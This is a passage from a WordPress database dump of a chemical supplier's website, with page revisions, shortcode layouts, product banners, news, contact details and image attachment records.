LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:21:56', '2016-08-15 22:21:56', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (113, 1, '2016-08-15 22:23:14', '2016-08-15 22:23:14', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-bottom"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:23:14', '2016-08-15 22:23:14', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (114, 1, '2016-08-15 22:24:42', '2016-08-15 22:24:42', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="29" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:24:42', '2016-08-15 22:24:42', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (115, 1, '2016-08-15 22:39:47', '2016-08-15 22:39:47', ' ', '', '', 'publish', 'closed', 'closed', '', '115', '', '', '2017-06-02 16:31:18', '2017-06-02 16:31:18', '', 0, 'https://132.148.10.86/wordpress/?p=115', 1, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (116, 1, '2016-08-15 22:40:21', '2016-08-15 22:40:21', '[product_categories number="10" parent="0" columns="4" title="Miller Stephenson Products"]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60"]\r\n<p class="alt-font lead"><strong><em><span class="fancy-underline">INTRODUCING</span></em></strong></p>\r\n[divider]\r\n<h1><strong>ReleaSys ™ </strong></h1>\r\n<h4 class="thin-font">Semi-Permanent Mold Release</h4>\r\n[button text="TELL ME MORE" style="white alt-button" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]', 'Products', '', 'publish', 'closed', 'closed', '', 'chemical-products', '', '', '2016-10-04 12:43:43', '2016-10-04 12:43:43', '', 0, 'https://132.148.10.86/wordpress/?page_id=116', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (117, 1, '2016-08-15 22:40:21', '2016-08-15 22:40:21', '', 'Products', '', 'inherit', 'closed', 'closed', '', '116-revision-v1', '', '', '2016-08-15 22:40:21', '2016-08-15 22:40:21', '', 116, 'https://132.148.10.86/wordpress/2016/08/15/116-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (118, 1, '2016-08-15 22:40:40', '2016-08-15 22:40:40', '[row]\r\n\r\n[col span="3"]\r\n<h3>Upcoming Trade Shows</h3>\r\n[/col]\r\n[col span="6"]\r\n\r\nSAMPE - Seattle 2017\r\n\r\nDate: May 22-25, 2017\r\n\r\nMiller-Stephenson will be exhibiting at the SAMPE 2017 show in Seattle. Learn more about how <a href="https://www.miller-stephenson.com/krytox/">Krytox</a> and <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">Release Agents</a> can help advance your technology.\r\n\r\n&nbsp;\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="50"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n<h3>Miller-Stephenson &amp; Chemours Official Channel Partners</h3>\r\n[/col]\r\n[col span="6"]\r\n\r\nAs you may have already heard, Dupont\'s Performance Chemicals business, which includes the Titanium Technologies and Chemicals &amp; Fluoroproducts business began operating as a separate company known as The Chemours Company ("Chemours™"), a wholly owned subsidiary of DuPont, as of January 1, 2015.\r\n\r\nMiller-Stephenson would like to take this opportunity to congratulate Chemours™ on becoming an officially new, stand-alone Company with a 200-year-old legacy, a portfolio of market-shaping products and a renewed commitment to their customers.\r\n\r\nChemours™ changeover to a stand-alone Company will not affect the manufacturing of their products, lead times or order conditions. Krytox, Vertrel® and DryFilm® are some of the Product lines that will transition from DuPont to Chemours™.\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="200"]\r\n\r\n[/col]\r\n\r\n[/row]', 'News', '', 'publish', 'closed', 'closed', '', 'news', '', '', '2017-05-02 19:40:42', '2017-05-02 19:40:42', '', 0, 'https://132.148.10.86/wordpress/?page_id=118', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (119, 1, '2016-08-15 22:40:40', '2016-08-15 22:40:40', '', 'News', '', 'inherit', 'closed', 'closed', '', '118-revision-v1', '', '', '2016-08-15 22:40:40', '2016-08-15 22:40:40', '', 118, 'https://132.148.10.86/wordpress/2016/08/15/118-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (120, 1, '2016-08-15 22:40:56', '2016-08-15 22:40:56', '[row]\r\n\r\n[col span="6"]\r\n\r\n[ninja_forms_display_form id="1"]\r\n\r\n[/col]\r\n[col span="6"]\r\n<h3>Global Offices</h3>\r\n<strong>Corporate Office</strong>\r\n55 Backus Ave.\r\nDanbury, CT 06810-7328\r\n800.442.3424\r\nFax 203.791.8702\r\ne-mail: ctsales@mschem.com\r\n\r\n<strong>Illinois</strong>\r\n6321 W. Dempster St. #302\r\nMorton Grove, IL 60053\r\n847.966.2022 / 800.447.4866\r\nFax 847.966.8468\r\ne-mail: ilsales@mschem.com\r\n\r\n<strong>California</strong>\r\n12261 Foothill Blvd.\r\nSylmar, CA 91342\r\n818.896.4714 / 800.771.8161\r\nFax 818.896.6086\r\ne-mail: casales@mschem.com\r\n\r\n<strong>Canada</strong>\r\n280 Belfield Road\r\nToronto, Ontario M9W 1H6\r\n800.307.2199\r\nFax 416.674.2987\r\ne-mail: canadasales@mschem.com\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col]\r\n\r\n[/col]\r\n\r\n[/row]', 'Contact', '', 'publish', 'closed', 'closed', '', 'contact', '', '', '2017-06-13 18:15:51', '2017-06-13 18:15:51', '', 0, 'https://132.148.10.86/wordpress/?page_id=120', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (121, 1, '2016-08-15 22:40:56', '2016-08-15 22:40:56', '', 'Contact', '', 'inherit', 'closed', 'closed', '', '120-revision-v1', '', '', '2016-08-15 22:40:56', '2016-08-15 22:40:56', '', 120, 'https://132.148.10.86/wordpress/2016/08/15/120-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (122, 1, '2016-08-15 22:41:11', '2016-08-15 22:41:11', '<h3>For URGENT requests, please call us at: 800-442-3424 (8-4 EST)</h3>\r\n<h4>Technical Support Request Form:</h4>\r\n[ninja_form id=11]', 'Tech Support', '', 'publish', 'closed', 'closed', '', 'tech-support', '', '', '2017-03-10 15:10:29', '2017-03-10 15:10:29', '', 0, 'https://132.148.10.86/wordpress/?page_id=122', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (123, 1, '2016-08-15 22:41:11', '2016-08-15 22:41:11', '', 'Tech Support', '', 'inherit', 'closed', 'closed', '', '122-revision-v1', '', '', '2016-08-15 22:41:11', '2016-08-15 22:41:11', '', 122, 'https://132.148.10.86/wordpress/2016/08/15/122-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (126, 1, '2016-08-15 22:43:40', '2016-08-15 22:43:40', '', 'Contact Us', '', 'publish', 'closed', 'closed', '', '126', '', '', '2017-08-18 13:29:18', '2017-08-18 13:29:18', '', 0, 'https://132.148.10.86/wordpress/?p=126', 15, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (128, 1, '2016-08-15 22:43:41', '2016-08-15 22:43:41', ' ', '', '', 'publish', 'closed', 'closed', '', '128', '', '', '2017-08-18 15:11:22', '2017-08-18 15:11:22', '', 0, 'https://132.148.10.86/wordpress/?p=128', 14, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (131, 1, '2016-08-15 22:43:40', '2016-08-15 22:43:40', ' ', '', '', 'publish', 'closed', 'closed', '', '131', '', '', '2017-06-02 16:31:19', '2017-06-02 16:31:19', '', 0, 'https://132.148.10.86/wordpress/?p=131', 2, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (134, 1, '2016-08-15 22:45:52', '2016-08-15 22:45:52', ' ', '', '', 'publish', 'closed', 'closed', '', '134', '', '', '2016-08-15 22:50:13', '2016-08-15 22:50:13', '', 0, 'https://132.148.10.86/wordpress/?p=134', 1, 'nav_menu_item', '', 0); 
INSERT INTO `wp_posts` VALUES (136, 1, '2016-08-15 22:53:22', '2016-08-15 22:53:22', '', 'MEdical', '', 'inherit', 'open', 'closed', '', 'medical-4', '', '', '2016-08-15 22:53:22', '2016-08-15 22:53:22', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MEdical-1-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (137, 1, '2016-08-15 22:54:31', '2016-08-15 22:54:31', '', 'PTFE coating', '', 'inherit', 'open', 'closed', '', 'ptfe-coating', '', '', '2016-08-15 22:54:31', '2016-08-15 22:54:31', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/PTFE-coating.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (138, 1, '2016-08-15 22:55:18', '2016-08-15 22:55:18', '', 'canstockphoto11467301', '', 'inherit', 'open', 'closed', '', 'canstockphoto11467301', '', '', '2016-08-15 22:55:18', '2016-08-15 22:55:18', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto11467301.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (139, 1, '2016-08-15 22:55:21', '2016-08-15 22:55:21', '', 'canstockphoto16166183', '', 'inherit', 'open', 'closed', '', 'canstockphoto16166183', '', '', '2016-08-15 22:55:21', '2016-08-15 22:55:21', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto16166183.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (140, 1, '2016-08-15 22:55:25', '2016-08-15 22:55:25', '', 'canstockphoto17561310', '', 'inherit', 'open', 'closed', '', 'canstockphoto17561310', '', '', '2016-08-15 22:55:25', '2016-08-15 22:55:25', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto17561310.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (141, 1, '2016-08-15 22:55:28', '2016-08-15 22:55:28', '', 'canstockphoto17704348', '', 'inherit', 'open', 'closed', '', 'canstockphoto17704348', '', '', '2016-08-15 22:55:28', '2016-08-15 22:55:28', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto17704348.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (142, 1, '2016-08-15 22:55:30', '2016-08-15 22:55:30', '', 'canstockphoto18567291', '', 'inherit', 'open', 'closed', '', 'canstockphoto18567291', '', '', '2016-08-15 22:55:30', '2016-08-15 22:55:30', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto18567291.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (143, 1, '2016-08-15 22:55:33', '2016-08-15 22:55:33', '', 'canstockphoto20528720', '', 'inherit', 'open', 'closed', '', 'canstockphoto20528720', '', '', '2016-08-15 22:55:33', '2016-08-15 22:55:33', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto20528720.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (144, 1, '2016-08-15 22:55:35', '2016-08-15 22:55:35', '', 'canstockphoto21547617', '', 'inherit', 'open', 'closed', '', 'canstockphoto21547617', '', '', '2016-08-15 22:55:35', '2016-08-15 22:55:35', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/canstockphoto21547617.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (145, 1, '2016-08-15 22:56:37', '2016-08-15 22:56:37', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER LUBRICANTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="195px" bg="11" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="SPECIALTY SOLVENTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="195px" bg="7" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="CONFORMAL COATINGS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="1/6"]\r\n\r\n[ux_banner height="270px" bg="138" animated="fadeIn" text_width="40%" text_align="right" text_pos="full-width far-top" parallax="0" parallax_text="0" hover="zoom"]\r\n\r\n[button size="medium" style="primary" text="MEDICAL CHEMICALS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="120px" bg="91" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="VAZO PRODUCTS" link="https://" target=""]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n[/row]\r\n\r\n[/ux_banner_grid]\r\n\r\n&nbsp;\r\n\r\n[row style="divided"]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Brand</h3>\r\n[divider]\r\n\r\n[ninja_form id=6]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Application</h3>\r\n[divider]\r\n\r\n[ninja_form id=7]\r\n\r\n[/col]\r\n\r\n[col span="1/3"]\r\n\r\n<h3>Search by Industry</h3>\r\n[divider]\r\n\r\n[ninja_form id=8]\r\n\r\n[/col]\r\n\r\n[/row]\r\n\r\n[ux_banner bg="https://imageurl" height="300px" text_color="light" text_align="center" text_pos="center" text_width="70%" parallax_text="0" parallax="0" effect=""]\r\n\r\n<h4 class="alt-font">INTRODUCING</h4>\r\n___\r\n<h1>RELEASYS&nbsp;<strong>™ </strong></h1>\r\n<h4 class="thin-font">Our new fluorinated water-based release agent</h4>\r\n[button text="TELL ME MORE" link="#" size="medium" style="alt-button white"]\r\n\r\n[/ux_banner]\r\n\r\n[row]\r\n\r\n[col span="5/6"]\r\n\r\n[message_box bg="#FFFFFF" text_color="dark"]\r\n\r\nWe are committed to providing our clients with superior customer service, delivery, and technical support to ensure successful product applications.\r\n\r\n[/message_box]\r\n\r\n[/col]\r\n\r\n<br>\r\n\r\n[col span="1/6"]\r\n\r\n&nbsp;<br>\r\n[button text="TECH SUPPORT" link="https://" style="primary"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 22:56:37', '2016-08-15 22:56:37', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (146, 1, '2016-08-15 22:57:25', '2016-08-15 22:57:25', '[ux_banner_grid height="400px" padding="10px"]\r\n\r\n[row]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="240px" text_color="light" text_width="60%" text_bg="#140066" bg="#140066"]\r\n\r\n&nbsp;\r\n<h3 class="alt-font" style="color: white;">Quality &amp; Service</h3>\r\n___\r\n<h1 class="animated fadeInLeft uppercase" style="color: white;">SINCE 1955</h1>\r\n<h3 class="animated fadeInRight">___</h3>\r\n\r\n[button text="MORE" link="https://" style="primary alt-button" size="normal"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="10px" text_color="light" animated="fadeIn" text_width="80%"]\r\n\r\n[/ux_banner]\r\n\r\n[ux_banner height="150px" bg="86" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="RELEASE AGENTS" link="https://"]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner height="400px" bg="78" animated="fadeIn" text_width="40%" parallax="0" parallax_text="0" hover="zoom" text_align="right" text_pos="full-width far-top"]\r\n\r\n[button size="medium" style="primary" text="KRYTOX &amp; OTHER 